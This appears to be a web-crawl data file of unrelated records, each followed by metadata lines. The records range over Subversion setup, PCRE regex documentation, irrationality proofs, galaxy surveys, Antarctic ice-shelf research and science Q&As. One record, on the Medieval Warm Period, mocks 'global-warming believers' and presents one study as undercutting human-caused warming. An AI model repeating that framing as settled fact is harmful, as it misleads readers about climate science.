solar-power system for Schering-Plough Corp. in Summit, N.J. When completed, the green energy project will be the largest rooftop solar installation in the United States. The business model of many electrical contractors does not involve outside sales, leaving those contractors out of position to approach the residential solar business, according to Bernie Kottlier, director, Green Building Solutions, Los Angeles Labor Management Cooperative Community (LALMCC). Those who have followed the solar photovoltaics (PV) industry for the last 15 years or more can be excused for feeling a tad skeptical about current claims that now the industry is on the verge of taking off.
<urn:uuid:3c0ee669-c370-48a5-8986-28aef8b438e4>
2.75
546
Content Listing
Science & Tech.
37.667526
Which of the following compounds shows aromatic properties? Definition: Any of a large class of organic compounds whose molecular structure includes one or more planar rings of atoms, usually but not always six carbon atoms. The ring's carbon-carbon bonds (π bonding) are neither single nor double but a type characteristic of these compounds, in which electrons are shared equally with all the atoms around the ring in an electron cloud.
<urn:uuid:2018cd21-05f8-44ea-bb33-b2ee3200d825>
3.140625
128
Content Listing
Science & Tech.
39.647834
From about A.D. 950 to 1250, the North Atlantic region of the globe experienced a period of higher-than-normal temperatures. Known as the Medieval Warm Period (MWP), it was a time in which crops could grow much further north than is now common and oceanic ice did not come as far south. Eventually the warming was reversed, and the world was plunged into the equally long Little Ice Age (LIA), lasting from about 1400 to 1700. This turn of events — significant warming in the pre-industrial period that corrected itself — would seem to present a problem for the theory of manmade global warming, which asserts that the Earth’s present alleged warming trend is primarily, if not solely, the result of human activity, specifically carbon dioxide emissions, and that it cannot be stopped absent a return to a pre-industrial world. Global-warming believers such as the Intergovernmental Panel on Climate Change (IPCC) have circumvented the inconvenient truths of MWP and LIA by claiming that both were strictly local events not reflective of global climate in general. Thus, they can then argue that carbon emissions, not cyclical climate changes, are the cause of the current, supposedly unprecedented phenomenon of rising global temperatures. Not anymore. A team of scientists led by Syracuse University geochemist Zunli Lu has discovered that the MWP and LIA reached all the way to Antarctica — in other words, over the entire world.
<urn:uuid:a0dcfb6a-72bd-4c26-8e6e-9841cd7bdae3>
3.78125
302
Truncated
Science & Tech.
40.777832
For instance, one of my rewrite rules for a project I'm working on is "replace o with ö if o is the next-to-last vowel and even numbered (counting left to right)". So, an example is: heabatoik would become heabatöik (o is the next-to-last vowel, as well as the 4th vowel); habatoik would not change (o is the next-to-last vowel, but is the 3rd vowel).

$str = preg_replace('/o(?=[^aeiou]*[aeiou][^aeiou]*$)/u', 'ö', $str);
// sketch: covers only the "next-to-last vowel" test; the even-numbered-vowel
// count cannot be expressed in one pattern and would need preg_replace_callback

Subpatterns are delimited by parentheses (round brackets), which can be nested. Marking part of a pattern as a subpattern does two things:

It localizes a set of alternatives. For example, the pattern cat(aract|erpillar|) matches one of the words "cat", "cataract", or "caterpillar". Without the parentheses, it would match "cataract", "erpillar" or the empty string.

It sets up the subpattern as a capturing subpattern (as defined above). When the whole pattern matches, that portion of the subject string that matched the subpattern is passed back to the caller via the ovector argument of pcre_exec(). Opening parentheses are counted from left to right (starting from 1) to obtain the numbers of the capturing subpatterns. For example, if the string "the red king" is matched against the pattern the ((red|white) (king|queen)), the captured substrings are "red king", "red", and "king", and are numbered 1, 2, and 3.

The fact that plain parentheses fulfill two functions is not always helpful. There are often times when a grouping subpattern is required without a capturing requirement. If an opening parenthesis is followed by "?:", the subpattern does not do any capturing, and is not counted when computing the number of any subsequent capturing subpatterns. For example, if the string "the white queen" is matched against the pattern the ((?:red|white) (king|queen)), the captured substrings are "white queen" and "queen", and are numbered 1 and 2. The maximum number of captured substrings is 99, and the maximum number of all subpatterns, both capturing and non-capturing, is 200.

As a convenient shorthand, if any option settings are required at the start of a non-capturing subpattern, the option letters may appear between the "?" and the ":". Thus the two patterns (?i:saturday|sunday) and (?:(?i)saturday|sunday) match exactly the same set of strings. Because alternative branches are tried from left to right, and options are not reset until the end of the subpattern is reached, an option setting in one branch does affect subsequent branches, so the above patterns match "SUNDAY" as well as "Saturday".

It is possible to name a subpattern using the syntax (?P<name>pattern). This subpattern will then be indexed in the matches array by its normal numeric position and also by name. PHP 5.2.2 introduced two alternative syntaxes: (?<name>pattern) and (?'name'pattern).

Sometimes it is necessary to have multiple matching but alternating subgroups in a regular expression. Normally, each of these would be given its own backreference number even though only one of them could ever possibly match. To overcome this, the (?| syntax allows having duplicate numbers. Consider the regex (?:(Sat)ur|(Sun))day matched against the string Sunday: here Sun is stored in backreference 2, while backreference 1 is empty. Matching Saturday yields Sat in backreference 1 while backreference 2 does not exist. Changing the pattern to use (?|, as in (?|(Sat)ur|(Sun))day, fixes this problem: using this pattern, both Sun and Sat would be stored in backreference 1.
<urn:uuid:7a42c6ae-b51b-4c06-82bd-562ad06ca0d8>
3.140625
779
Documentation
Software Dev.
52.347729
Last week, I got my copy of the 2012 Particle Data Group Review of Particle Physics booklet — which, along with its heavy, 1000-page full-length counterpart, we simply call “the PDG.” My very first copy, during my first months at CERN in the summer of 2003, is a vivid memory for me. Here was a book with almost everything you want to know, about every particle ever discovered! It was like the book of dinosaurs I had when I was a kid, and I read it in exactly the same way: flipping to a random page and reading a few facts about, say, the charged kaon. My new copy of the PDG has inspired me to adapt this fun for non-experts. So each day, I’ll feature a new particle on Twitter; I’m @sethzenz, and the hashtag will be #ParticleOfTheDay. Since starting last week, I’ve featured the B0s meson, the pion, the kaon, the electron, and the Higgs. How long can I keep this up? That is, how many particles are there? Well, that depends on how you count. The Standard Model has 3 charged leptons, 3 neutrinos, 6 quarks, the photon, the gluon, and the W, Z, and Higgs bosons. But then there are all the antiparticles. Dark matter candidates. The graviton. I could even argue for taking 8 days covering all the gluon colors! (Don’t worry, I won’t.) But most of all, there are all the composite particles — those that are made from a combination of quarks. There are a very large number of those, and there will always be more to find too, because you can always add more energy to the same combination of quarks. The point isn’t to be systematic. I might go back and be more specific. I might repeat. What I really want to do is find a particle each day that’s in the news or that I can say something interesting about. Flipping at random through a book of particles turns out not to be the best way to learn particle physics; ultimately, I needed to learn the principles by which those particles are organized. But it is an interesting way to tell the story of particle physics: its history and how it’s done today. After all, the particles do come out of accelerators in a random jumble; it’s our job to organize them. Have an idea for the Particle of the Day, and what to say about it? Let me know!
<urn:uuid:72c59262-4f2e-4b62-bdda-b55f3f41a133>
2.953125
557
Personal Blog
Science & Tech.
70.446659
2012, Oceanography 25(3):202–203, http://dx.doi.org/10.5670/oceanog.2012.95 Adrian Jenkins | British Antarctic Survey, Natural Environment Research Council, Cambridge, UK Pierre Dutrieux | British Antarctic Survey, Natural Environment Research Council, Cambridge, UK Stan Jacobs | Lamont-Doherty Earth Observatory of Columbia University, Palisades, New York, USA Steve McPhail | National Oceanography Centre, Southampton, UK James Perrett | National Oceanography Centre, Southampton, UK Andy Webb | National Oceanography Centre, Southampton, UK Dave White | National Oceanography Centre, Southampton, UK In recent years, mass loss from the Antarctic Ice Sheet has contributed nearly 0.5 mm yr⁻¹ to global mean sea level rise, about one-sixth of the current rate (Church et al., 2011). Around half of that contribution has come from accelerated draining of outlet glaciers into the southeast Amundsen Sea (Rignot et al., 2008), where the flow speed of Pine Island Glacier (PIG; Figure 1) in particular has increased by over 70%, to around 4 km yr⁻¹, since the first observations in the early 1970s (Rignot, 2008; Joughin et al., 2010). The accelerations have been accompanied by rapid thinning of the glaciers extending inland from the floating ice shelves that form the glacier termini (Shepherd et al., 2002, 2004). One implication of these observed patterns of change is that the mass loss has probably been driven by changes in the rate of submarine melting of the floating ice shelves. The ubiquitous presence of warm Circumpolar Deep Water (CDW) on the Amundsen Sea continental shelf, at temperatures 3–4°C above the pressure freezing point, was first revealed during a 1994 cruise of RVIB Nathaniel B. Palmer (Jacobs et al., 1996). Repeat observations at the Pine Island Ice Front made from the Palmer in 2009 showed that submarine melting of PIG had increased by 50% over the intervening 15 years despite a modest rise in the temperature of CDW of only about 0.1°C (Jacobs et al., 2011). While ice front observations were able to document those changes, the reason for the dramatic increase in submarine melting would have remained speculative while the ocean cavity beneath the approximately 65 × 35 km, fast-flowing, central part of the ice shelf remained a black box. Jenkins, A., P. Dutrieux, S. Jacobs, S. McPhail, J. Perrett, A. Webb, and D. White. 2012. Autonomous underwater vehicle exploration of the ocean cavity beneath an Antarctic ice shelf. Oceanography 25(3):202–203, http://dx.doi.org/10.5670/oceanog.2012.95. Church, J.A., N.J. White, L.F. Konikow, C.M. Domingues, J.G. Cogley, E. Rignot, J.M. Gregory, M.R. van den Broeke, A.J. Monaghan, and I. Velicogna. 2011. Revisiting the Earth’s sea-level and energy budgets from 1961 to 2008. Geophysical Research Letters 38, L18601, http://dx.doi.org/10.1029/2011GL048794. Jacobs, S.S., H.H. Hellmer, and A. Jenkins. 1996. Antarctic ice sheet melting in the southeast Pacific. Geophysical Research Letters 23:957–960, http://dx.doi.org/10.1029/96GL00723. Jacobs, S.S., A. Jenkins, C.F. Giulivi, and P. Dutrieux. 2011. Stronger ocean circulation and increased melting under Pine Island Glacier ice shelf. Nature Geoscience 4:519–523, http://dx.doi.org/10.1038/ngeo1188. Jenkins, A., P. Dutrieux, S.S. Jacobs, S.D. McPhail, J.R. Perrett, A.T. Webb, and D. White. 2010. Observations beneath Pine Island Glacier in West Antarctica and implications for its retreat. Nature Geoscience 3:468–472, http://dx.doi.org/10.1038/ngeo890. Joughin, I., B.E. Smith, and D.M. Holland. 2010. 
Sensitivity of 21st century sea level to ocean-induced thinning of Pine Island Glacier, Antarctica. Geophysical Research Letters 37, L20502, http://dx.doi.org/10.1029/2010GL044819. McPhail, S.D., M.E. Furlong, M. Pebody, J.R. Perrett, P. Stevenson, A. Webb, and D. White. 2009. Exploring beneath the PIG Ice Shelf with the Autosub3 AUV. Paper presented at Oceans 09 – Europe, Bremen, Germany, May 11–14, 2009, http://dx.doi.org/10.1109/OCEANSE.2009.5278170. Rignot, E. 2008. Changes in West Antarctic ice stream dynamics observed with ALOS PALSAR data. Geophysical Research Letters 35, L12505, http://dx.doi.org/10.1029/2008GL033365. Rignot, E., J.L. Bamber, M.R. van den Broeke, C. Davis, Y. Li, W.J. van de Berg, and E. van Meijgaard. 2008. Recent Antarctic ice mass loss from radar interferometry and regional climate modelling. Nature Geoscience 1:106–110, http://dx.doi.org/10.1038/ngeo102. Schoof, C. 2007. Ice sheet grounding line dynamics: Steady states, stability, and hysteresis. Journal of Geophysical Research 112, F03S28, http://dx.doi.org/10.1029/2006JF000664. Shepherd, A., D.J. Wingham, and J.A.D. Mansley. 2002. Inland thinning of the Amundsen Sea sector, West Antarctica. Geophysical Research Letters 29, 1364, http://dx.doi.org/10.1029/2001GL014183. Shepherd, A., D. Wingham, and E. Rignot. 2004. Warm ocean is eroding West Antarctic ice sheet. Geophysical Research Letters 31, L23402, http://dx.doi.org/10.1029/2004GL021106.
<urn:uuid:5c87e5a6-7de5-438a-b63d-68aae7e7dd08>
2.9375
1,445
Knowledge Article
Science & Tech.
83.590357
If $p/q$ and $r/s$ are two distinct rational numbers written in their lowest terms, then $p/q - r/s = (ps-qr)/qs$, which implies that $|ps-qr| \geq 1$, which implies that $|p/q - r/s| \geq 1/qs$. Therefore, if $x$ is a real number and we can find a sequence of rational numbers $p_n/q_n$ (in their lowest terms, with denominators tending to infinity) such that $|x - p_n/q_n| = o(1/q_n)$ (which is equivalent to saying that $|q_n x - p_n| \to 0$), then $x$ cannot be rational.♦ Loosely speaking, if you can approximate $x$ well by rationals, then $x$ is irrational. This turns out to be a very useful starting point for proofs of irrationality.

Let us construct inductively a sequence of rationals that approximate $\sqrt 2$. (This is not necessarily the best proof of the irrationality of $\sqrt 2$ but it gives an easy illustration of the technique.) We begin with $p_1 = q_1 = 1$, and observe that $p_1^2 - 2q_1^2 = -1$. If $p_1/q_1$ were $\sqrt 2$, then we would have $p_1^2 - 2q_1^2 = 0$, so the "$-1$" at the end of this is our error term in the first approximation. Now suppose we have defined $p_n$ and $q_n$ in such a way that $p_n^2 - 2q_n^2 = \pm 1$. Then set $p_{n+1} = p_n + 2q_n$ and $q_{n+1} = p_n + q_n$. (The justification for this choice is that if $p_n/q_n$ were $\sqrt 2$ then $p_{n+1}/q_{n+1}$ would be too, as can easily be checked.) Then $$p_{n+1}^2 - 2q_{n+1}^2 = (p_n + 2q_n)^2 - 2(p_n + q_n)^2 = -(p_n^2 - 2q_n^2) = \mp 1.$$ Thus, we have constructed a sequence of rationals $p_n/q_n$, with denominators tending to infinity, such that $|p_n^2 - 2q_n^2| = 1$ for every $n$. But from this we deduce that $|p_n - q_n\sqrt 2| \cdot |p_n + q_n\sqrt 2| = 1$, and therefore that $|q_n\sqrt 2 - p_n| = 1/(p_n + q_n\sqrt 2)$. Since $p_n + q_n\sqrt 2 \to \infty$, this tends to $0$, and the criterion above shows that $\sqrt 2$ is irrational.

To prove the irrationality of $e$, we start with the power-series expansion: $e = \sum_{k=0}^{\infty} 1/k!$. We then set $p_n/q_n$ to be $\sum_{k=0}^{n} 1/k!$. This is a fraction with denominator $q_n$ that divides $n!$. It differs from $e$ by $\sum_{k=n+1}^{\infty} 1/k!$, which is less than $2/(n+1)!$. Also, this difference is strictly positive, so $q_n e - p_n$ is never zero. Therefore, $|q_n e - p_n| \leq n! \cdot 2/(n+1)! = 2/(n+1) \to 0$, so $e$ is irrational.

The two proofs given so far can easily be, and usually are, presented in other ways that do not mention the basic principle explained in the quick description. However, sometimes that basic principle plays a much more important organizational role: one is given a number $x$ to prove irrational, and one attempts to do so by finding a sequence of good rational approximations to $x$. Another point is that if $x$ is irrational then such a sequence always exists: one can take the convergents from the continued-fraction expansion of $x$. But this observation is less helpful than it seems, since for many important irrational numbers (such as $\zeta(3)$) there does not seem to be a nice formula for the continued-fraction expansion. The point of the method explained here is that it is much more flexible: any sequence of good approximations will do (and sequences are indeed known that prove the irrationality of $\zeta(3)$).
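A quick numerical check of the $\sqrt 2$ construction, as a minimal Python sketch (an illustration of the recurrence, not part of the proof): it iterates $p_{n+1} = p_n + 2q_n$, $q_{n+1} = p_n + q_n$, confirms that $p_n^2 - 2q_n^2$ alternates between $-1$ and $+1$, and shows $|q_n\sqrt 2 - p_n|$ shrinking:

from math import sqrt

p, q = 1, 1
for n in range(1, 9):
    # invariant from the argument above: p*p - 2*q*q is always +1 or -1
    print(n, p, q, p*p - 2*q*q, abs(q*sqrt(2) - p))
    p, q = p + 2*q, p + q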
<urn:uuid:fed96f57-f109-4469-89ba-dc72430980bf>
3.5
482
Academic Writing
Science & Tech.
43.828314
In this case, "o" means object. It's an attempt at using the "Systems" variation of Hungarian notation. There are two types of Hungarian: Systems and Apps. Systems Hungarian uses a prefix to identify the type of data stored. For example, the "i" in iCounter would indicate that the variable is an integer. Apps Hungarian took a completely different approach and specifies that the prefix should indicate the purpose of the data. For example, the "rw" in rwPosition would mean row. The Windows API used Systems Hungarian. This led to a large number of other programmers also using it. The unfortunate aspect is that when changes were made to the API, the old variable names were kept even when the actual data type changed. This led to large amounts of confusion as to what data type should be passed for a given parameter of an API function, especially around the various handle types. In the .NET coding guidelines, Microsoft explicitly states that Hungarian shouldn't be used. The reality is that they are talking about "Systems" Hungarian, which I 100% agree with. "Apps" Hungarian, on the other hand, has a ton of uses, as you are describing the data, not the type. At the end of the day, just remove the "o". It adds nothing to the program. Oh, and for interesting reading, check out Joel's take on this at: http://www.joelonsoftware.com/articles/Wrong.html
<urn:uuid:78e73d65-3bd4-4bfa-99b3-848d64e1b5e5>
3.109375
305
Q&A Forum
Software Dev.
59.586538
4.2. Getting Files into the Repository
Now that you have created the empty repository, it's time to get the project files into it. To do this, you need to put the files into a basic directory structure for the repository, and then import the entire structure.
It would be possible to make that directory structure as simple as a single directory named hello_world, with hello.c and Makefile inside. In practice, though, this isn't a very good directory structure to use. If you recall from the previous chapter, Subversion does not have any built-in support for branches or tags, but instead just uses copies. This proves to be a flexible way to handle branches and tags, but if they're just copies, there is no set means for identifying which files are branches and which files are on the main source trunk. The recommended way to get around this missing information is to create three directories in your repository, one named branches, another named tags, and a third named trunk. Then, by convention, you can put all branched versions of the project into the branches directory and all tags into the tags directory. The trunk directory will be used to store the main development line of the project.
With large, complex repositories, there are a number of different ways you can set up the directories for the trunk, branches, and tags, which can accommodate multiple projects in one repository, or facilitate different development processes. Because our test project is simple, though, we'll keep the repository simple and place everything at the top level of the repository.
So, to get everything set up, you first need to create an overall directory for the repository, called repos. Then, set up trunk, branches, and tags directories under that, and move the original source files for the project into the trunk directory.
$ mkdir repos
$ mkdir repos/trunk
$ mkdir repos/branches
$ mkdir repos/tags
$ ls repos
branches tags trunk
$ mv hello.c repos/trunk/
$ mv Makefile repos/trunk/
$ ls repos/trunk/
Makefile hello.c
After the directories are created and filled, the only thing left to do is import the directory into our repository. This is done using the import command in the svn program. The --message "Initial import" option supplies the log message that will be recorded with this first revision.
$ svn import --message "Initial import" repos file:///home/bill/my_repository
Adding repos/trunk
Adding repos/trunk/hello.c
Adding repos/trunk/Makefile
Adding repos/branches
Adding repos/tags
Committed revision 1.
Now that the repository structure has been imported, you can delete the original files. Everything should now be stored in the database, and ready for you to check out a working directory and begin hacking.
4.3. Creating a Working Copy
The working copy is where you make all of your changes to the files in the repository. You check out the working copy directory by running the svn checkout command, which contacts the repository to retrieve a copy of the most recent revision of all the data in your repository. A local directory tree that matches the tree inside the repository will be created, and the downloaded working directory files will be placed in there.
$ svn checkout file:///home/bill/my_repository/trunk my_repos_trunk
A my_repos_trunk/hello.c
A my_repos_trunk/Makefile
Checked out revision 1.
As you can see, Subversion has checked out the directory from your repository, creating a local working copy directory with the name you supplied (my_repos_trunk). Now, if you look closely at your new working copy, you can see that Subversion also has placed one additional directory in the directory that you checked out.
$ ls my_repos_trunk
Makefile hello.c
$ ls -A my_repos_trunk
.svn Makefile hello.c
When you check out a repository, Subversion places a .svn administrative directory in every directory of the working copy. Inside these directories, Subversion stores a wide variety of metadata about the working directory, including which repository the working directory comes from and which revisions of each file have been checked out. It also stores complete pristine versions of the last checked-out revision of each file in the working directory. This allows Subversion to provide you with fast local operations, such as reporting what you have modified or reverting a change, without contacting the repository over the network.
<urn:uuid:48c50c81-0e2f-4550-9f3e-7876f308d1b6>
2.96875
918
Tutorial
Software Dev.
40.124195
Since the time of the Herschels, surveys of bright galaxies have provided the foundations upon which much of observational cosmology rests. A history of the major surveys extends from William and John Herschel in the first half of the 19th century, through William Parsons, the third Earl of Rosse, to Isaac Roberts, Dreyer (1888), Keeler (1900), Perrine (1904), Hardcastle (1914), Fath (1914), Pease (1917), Curtis (1918), Hubble (1922, 1926), and into modern times. The publication of the New General Catalog by Dreyer in 1888 and its two Index Catalog supplements in 1895 and 1908 marks the beginning of reference works that are still in regular use. Photographic studies of the brighter Herschel galaxies using large telescopes began with Keeler's survey, employing the Lick 36-inch Crossley reflector, which culminated in the historic Lick Observatory Publications 13, 1918, by Curtis. Photographic surveys at Mount Wilson were begun by Ritchey in 1909 and by Pease when the long-focal-length 60-inch reflector (hereafter W60) was completed. In two remarkable summary articles by Pease (1917, 1920), a number of features of famous nearby galaxies were illustrated for the first time. The Mount Wilson photographic survey was continued by Hubble in the early 1920s using the W60 and the newly completed Hooker 100-inch (W100) reflector, which had been put into routine operation in 1919. The completion of this early work led Hubble (1922, 1926) to the formulation of the system of galaxy morphology that is the foundation of the modern standard method of classification. Hubble's 1926 paper contains the classification of 400 of the brightest NGC galaxies taken from the Hardcastle (1914) listing, which until 1932 was the most homogeneous catalog in existence, based, as it was, on the Franklin-Adams plates taken in the early years of the century and covering the entire sky. The Harvard survey of 1246 bright galaxies was published by Shapley and Ames in 1932. This catalog (hereafter called the SA) has a fair degree of homogeneity within its magnitude limit at m_pg = 13.2. Furthermore, the uniform way in which Shapley and Ames compiled the data from both hemispheres using new plate material produced, for the first time, an approximation to a magnitude-limited sample. The SA became the basic listing of bright galaxies and has played a major role in studies of galaxies in the local region. It has only recently been supplemented by the first and second editions of the Reference Catalog of Bright Galaxies (de Vaucouleurs and de Vaucouleurs 1964, for RC1; de Vaucouleurs, de Vaucouleurs, and Corwin 1976, for RC2). Following Hubble's initial work, the Mount Wilson photographic survey was continued through the 1930s principally by Hubble, Baade, and Humason, with a primary aim of obtaining large-scale plates of all galaxies listed in the SA north of declination δ = -15°. The purpose was to classify the galaxies for morphological studies, a process which, as is now known, leads directly to the central problem of galaxy formation and evolution. The survey, stopped between 1940 and 1945 during World War II, resumed in 1946, and was transferred to Palomar when the Hale 5-meter telescope (P200) was put into operation in 1949. Beginning in 1974, the project was extended to the south using plates taken at the Las Campanas Observatory, Chile, first with the Swope 1-meter reflector (C40), and after 1977 with the du Pont 2.5-meter reflector (C100). Results from the southern survey to 1979 are given elsewhere (Sandage and Brucato 1979, 1981).
In parallel with Hubble's work to obtain large-scale plates of the bright SA galaxies, Humason at Mount Wilson and Mayall at Lick began a program in the 1930s to measure redshifts in the northern sector of the SA. By 1956, they had obtained redshifts for all SA galaxies brighter than m_pg = 11.7 north of δ = -30°, and for many fainter galaxies. The Humason-Mayall redshift catalog (Humason, Mayall, and Sandage 1956) is 63% complete for all listed SA galaxies north of δ = -30°. Since 1956, a number of radio and optical observers have combined efforts to complete the redshift coverage for nearly the entire Shapley-Ames catalog in both hemispheres. Redshift values now exist for all but six SA galaxies, and many of the earlier optical values have been improved through 21-cm observations.
<urn:uuid:7fdcfa53-19c0-4d7d-8688-5db1cdcf9dcb>
3.421875
981
Knowledge Article
Science & Tech.
46.231375
Blue Electron Beam
Name: Justin S.
When using the Leybold q/m apparatus, why is the beam of electrons coming out of the electron gun blue?
I cannot say for certain, because I do not have the apparatus. I can, however, think of two very likely possibilities. One, of course, is that the source of electrons is also a source of blue light. To make a material emit electrons, it must receive extra energy. One way to do this is through heat. If a filament is heated to make it emit electrons, it may also be hot enough to glow blue. A less likely possibility is electrons colliding with air molecules, with blue photons being released during the collisions. For this to be true, there would have to be a huge number of electrons all losing the same amount of energy when crashing into air molecules. One way to determine whether a blue-glowing filament is the cause is with a focusing mirror. Get a concave mirror with a focal length of several centimeters (8-12 cm). Place the mirror at an angle of about 45 degrees in the beam, at least twice the focal length from where the electrons are produced. Hold up a paper in the reflected light, about two focal lengths from the mirror. If you can see a blue filament projected on the paper, you are seeing the source of the blue light. You may have to adjust the paper's location to refine the focus.
Dr. Ken Mellendorf
Illinois Central College
It sounds like emission of light from excitation of the gas in the apparatus by the electron beam, but I am not sure what gas is in the apparatus.
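For anyone setting up that mirror test, here is a quick sketch of the mirror-equation arithmetic (the numbers are illustrative assumptions, not values from the answer above):

# Concave-mirror imaging for the filament test: 1/f = 1/d_o + 1/d_i.
# With the filament a bit beyond two focal lengths away, a real, slightly
# reduced image forms between f and 2f, which is where the paper should go.
f = 0.10                       # assumed focal length, metres (10 cm)
d_o = 0.25                     # assumed filament-to-mirror distance, metres
d_i = 1 / (1 / f - 1 / d_o)    # image distance from the mirror
m = -d_i / d_o                 # magnification (negative = inverted image)
print(f"hold the paper about {d_i:.2f} m out; image is {abs(m):.2f}x actual size")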
<urn:uuid:e4bd341a-dc97-4931-94d1-7ec6fc67f6e5>
3.46875
377
Q&A Forum
Science & Tech.
56.729561
Sea Gull Behavior
We are 300 miles from the east coast on Claytor Lake in VA. Lately we have seen thousands of sea gulls on the water and flying around. What are they doing so far inland, where do they go at night, and where do they go from here?
I'm from Illinois, so I can't answer specific questions. However, the term "sea gull" is so vague as to be meaningless. There are several common species of gulls and quite a few less common ones, and many of them range far from the "sea." In the Chicago area, ring-billed gulls are found on Lake Michigan and far inland on and around ponds, lakes, and shopping centers - wherever they can scavenge for food. On the east coast, according to the range maps in the Peterson field guide, ring-billed and herring gulls winter along the Virginia coast, and the herring gulls' breeding range is "expanding." This edition of the guide was published in 1980. Gulls are scavengers and will go wherever there is food.
<urn:uuid:e4790ed3-8249-4632-aaca-e5b590548dd8>
3.109375
246
Knowledge Article
Science & Tech.
63.557913
Weekly Problem 27 - 2013
Can you find the area of a parallelogram defined by two vectors?
The seven pieces in this 12 cm by 12 cm square make a Tangram set. What is the area of the shaded parallelogram?
Four rods, two of length a and two of length b, are linked to form a kite, as shown in the diagram. The linkage is moveable so that the angles change. What is the maximum area of the kite? Now suppose the four rods are assembled into a linkage which makes a parallelogram. What is the maximum area of this parallelogram?
<urn:uuid:0e6d0a69-bc16-4a82-a7b6-5e0d6a20b85b>
3.234375
131
Q&A Forum
Science & Tech.
70.28
|11 Nov 2010|| Blueprint to protect the future of Australia's oceans revealed
Conservation Biology paper - assessing the capacity of Australia's protected areas to protect endangered species
A new paper has come out in Conservation Biology entitled "The capacity of Australia's protected-area system to represent threatened species", by James Watson et al. See the paper in full at http://dx.doi.org/doi:10.1111/j.1523-1739.2010.01587.x
Picked up by the media as follows:
Australasian Science Magazine:
1. February 2010: Will REDD payments save threatened species?, David Salt
2. February 2010: Is conservation too conservative?, Hugh Possingham
3. March 2010: Real conservation targets, Hugh Possingham
4. April 2010: A world of biodiversity challenges - so different yet so similar, Hugh Possingham
5. May 2010: The case for biodiversity offsets, Phil Gibbons
6. July 2010: What do greenies want?, Hugh Possingham
7. September 2010: The news is not good..., David Salt
8. October 2010: Australia's acoustic environmental accounts, Hugh Possingham
9. November 2010: Does fishing kill fish?, Hugh Possingham
|29 Oct 2010|
|31 Aug 2010||Fantastic world media for croc work at UQ, involving AEDA's Matthew Watts
An article from Notes and News in the Bulletin of the British Ecological Society 2010 details tremendous media coverage for research done by UQ's Dr Hamish Campbell & Dr Craig Franklin. It is also significant for AEDA, as our own Matt Watts played an important part in the research. A press release from the Bulletin has apparently had more coverage than "any other journal paper in the past 10 years, with more than 325 individual items of coverage in the UK, US, [and] Australia in print and on TV and radio". The Bulletin estimates that the total audience could be over 15 million!! Well done Hamish, Craig and Matt! Full article HERE and see the YouTube coverage too.
|1 July 2010|| A new paper on improving protected area networks was published this morning in Nature. We show that dramatic improvements to the performance of a protected area system can be made by replacing a small number of poorly performing areas with new ones that are more cost-effective for conservation. This can be done without spending any more money, by trading up poor-quality sites for those that achieve more for conservation. See the paper at: http://dx.doi.org/10.1038/nature09180 Comment on this in the Economist
|19 June 2010 - The Age|| Professor Hugh Possingham's [UQ, AEDA Director] idea is simple - it is called the endangered species lottery. First the federal government creams off $20 million from taxes on gambling revenue as a prize. Then the names of Australian endangered species are written on balls and put in a barrel. On Melbourne Cup day the federal environment minister draws a ball from the barrel live on television just before the big race. Landholders who have populations of the winning species on their property are given a slice of the $20 million pie, with more money apportioned for larger populations. Possingham, a world-renowned ecologist and mathematician at the University of Queensland, says the lottery would encourage landowners to look after and even increase these populations of endangered species in the hope of winning money ... READ ON
|15 June 2010|| Nature News - New UN science body to monitor biosphere
Representatives from close to 90 countries, gathered in Busan, Korea, this week, have approved the formation of a new organization to monitor the ecological state of the planet and its natural resources.
Dubbed the Intergovernmental Science-Policy Platform on Biodiversity and Ecosystem Services (IPBES), the new entity will likely meet for the first time in 2011 and operate much like the Intergovernmental Panel on Climate Change (IPCC). In essence, that means the IPBES will specialize in "peer review of peer review", says Nick Nuttall, a spokesman for the United Nations Environment Programme, which has so far hosted the IPBES birth process. Read the article HERE
|14 June 2010||The Age - Safeguarding our species
Declared the 'Year of Biodiversity' by the United Nations, 2010 provides an opportunity to celebrate life on earth and to safeguard biodiversity, the variety of life. Nerissa Hannink reports on projects at the University of Melbourne that reevaluate the number of species on the planet and explore the most innovative ways of keeping them alive. Work by Dr Tracy Rout & Dr Michael McCarthy from Uni Melbourne is discussed.
A paper discussing cross-border conservation, an AEDA international collaboration, gets lots of press. The paper: Kark, S., N. Levin, H. S. Grantham and H. P. Possingham (2009). "Between-country collaboration and consideration of costs increase conservation planning efficiency in the Mediterranean Basin." Proceedings of the National Academy of Sciences of the USA 106(36): 15368-15373 (web pdf or email for reprint)
|13 December 2009||ScienceAlert.com features our article on climate change - Twenty years on, what don't we know? by Phil Gibbons & Adam Felton|
|30 November 2009||Oscar Venter in an article on the REDD carbon trading scheme published in Time Magazine: Banking on Trees|
|26 November 09||Hugh interviewed at Conservation Bytes|
|24 November 09|| ABC NewsMail - morning edition - WEB SITE
An Australian biologist says climate change is speeding up the creation of new species through the merging of habitats.
Drs James Watson and Liana Joseph were commissioned by the Department of Environment, Water, Heritage and the Arts (DEWHA) to produce an independent report on the recent and ongoing Timor Sea oil slick. More than 20 different media outlets have picked up on this. Click on any one of the links below to go to media reports:
|10 November 2009||BBC One Minute News - Koalas 'could face extinction' - report with short video of Hugh and Deb Tabart (Aust Koala Foundation) speaking about the plight of koalas|
|October 09||NATIVE BIRD POPULATIONS DECLINING RAPIDLY: ABC 7:30 REPORT, including comments on Australia's National Biodiversity Strategy 2010-2020.|
|October 09||Hugh interviewed by a French journalist in Australia reporting for Le Monde national newspaper (apparently the French equivalent of the NYT or The Guardian) about marine bioregional planning, and Carissa Klein by La Croix. Sylvaine and Iadine did a bit of translating of Carissa's interview (see link below) and basically it says that MPAs are very important and have been successful in Australia. It also discusses the new reserve system that Canberra will invest in, mentioning Peter Garrett and GBRMPA, and says that Canberra signed an agreement with the six countries of the Coral Triangle to help them protect their pretty-beautiful marine areas. However, Iadine thought the journalist was playing on words "... comparing marine areas to "beautés marines", e.g. beautiful things from the sea (mermaids?). He's trying to make us dream. There must be some kind of advertising for travelling on the next page" and in fact she was right! Yes, Sylvaine found an ad for holidays on the next page of the paper!
For anyone who can read French, the article itself.
An AEDA paper published in Conservation Letters on Reduced Emissions from Deforestation and forest Degradation (REDD) and biodiversity conservation hits 65 media outlets and radio. Led by Oscar Venter, an AEDA PhD student (www.aeda.edu.au), researchers from around the world have determined that REDD could offset deforestation if used in cost-efficient areas, such as Kalimantan. Oscar was interviewed by Phil Kafcaloudes and Adelaine Ng from the Breakfast Club on Radio Australia on 10 June 2009 - LISTEN HERE
